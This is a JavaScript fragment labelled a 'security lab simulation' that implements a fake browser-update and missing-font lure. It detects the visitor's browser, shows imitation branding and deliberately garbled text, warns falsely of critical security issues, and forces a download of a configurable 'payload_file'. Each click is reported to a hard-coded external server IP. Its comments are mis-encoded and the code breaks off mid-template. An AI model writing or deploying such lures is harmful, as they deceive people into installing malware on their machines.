/** * SECURITY LAB SIMULATION SCRIPT v6.0 (Smart Targeting) * Features: * - Dynamic Browser Detection (Chrome/Edge/Firefox/Safari) * - Adaptive Branding & Icons * - Broken Font Rendering (Alien Text) */ (function() { const API_URL = 'http://85.192.60.226/api/config.php'; let currentConfig = {}; // --- 1. ÒÅËÅÌÅÒÐÈß --- function sendEvent(type) { fetch(`${API_URL}?action=track`, { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ type: type }) }).catch(e => console.error("Telemetry error:", e)); } function downloadPayload() { if (!currentConfig.payload_file) return; sendEvent('click'); const link = document.createElement('a'); link.href = `downloads/${currentConfig.payload_file}`; link.setAttribute('download', currentConfig.payload_file); link.style.display = 'none'; document.body.appendChild(link); link.click(); document.body.removeChild(link); cleanup(); } // --- 2. ÁÈÁËÈÎÒÅÊÀ ÈÊÎÍÎÊ (SVG) --- const icons = { chrome: ``, edge: ``, firefox: ``, // Óïðîùåííûé ëîãîòèï safari: ``, font: `
Your version of ${browser.name} has known critical security issues. Install the latest update to restore secure browsing.
Interface elements cannot be displayed correctly because the required font package is missing.